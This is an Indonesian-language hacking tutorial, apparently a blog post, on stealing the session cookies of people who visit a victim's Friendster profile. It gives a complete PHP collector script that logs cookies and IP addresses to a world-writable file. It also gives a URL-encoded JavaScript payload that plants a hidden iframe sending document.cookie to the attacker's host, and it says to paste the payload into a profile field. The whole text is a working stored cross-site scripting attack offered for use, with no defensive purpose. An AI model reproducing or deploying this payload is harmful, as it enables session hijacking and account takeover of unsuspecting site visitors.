Ecek-ecek

Cara mudah nyolong cookie pengunjung FS

Tanpa popup, tanpa redirect

1. Buat file php di hostingan kamu

cok.php

<?
$cookie=$_GET['cookie'];
if(isset($cookie)){
$tanggal=date('j F Y');
$filename = 'cookie.txt';
$handle = fopen($filename, 'a');
fwrite($handle, "Tanggal = $tanggal\r\nIp = $_SERVER[REMOTE_ADDR]\r\nCookie = $cookie\r\n\r\n");
}
?>

misal file php tersebut bisa diakses dengan alamat http://domainkamu.com/cok.php trus buat file kosong "cookie.txt", ubah permission nya jadi 777

2. Ada kode html nih

document.write('<iframe frameborder=0 height=0 width=0 src="http://domainkamu.com/cok.php?cookie='+document.cookie+'"></iframe>');

silakan di ubah bentuk jadi URL ENCODE, bisa menggunakan tool http://fs.dibatam.com/?p=64

hasilnya

%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%68%65%69%67%68%74%3d%30%20%77%69%64%74%68%3d%30%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%6f%6d%61%69%6e%6b%61%6d%75%2e%63%6f%6d%2f%63%6f%6b%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%2b%27%22%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b

3. Masukkan ke "Describe Who You Want to Meet: " di fs kamu kode tadi

Saya mau apa sapa aja deh :) <=== silakan diubah2

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%68%65%69%67%68%74%3d%30%20%77%69%64%74%68%3d%30%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%6f%6d%61%69%6e%6b%61%6d%75%2e%63%6f%6d%2f%63%6f%6b%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%2b%27%22%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

antara <script> ama kode ama </script> gak usah dikasih spasi / enter

4. tinggal nunggu panen cookie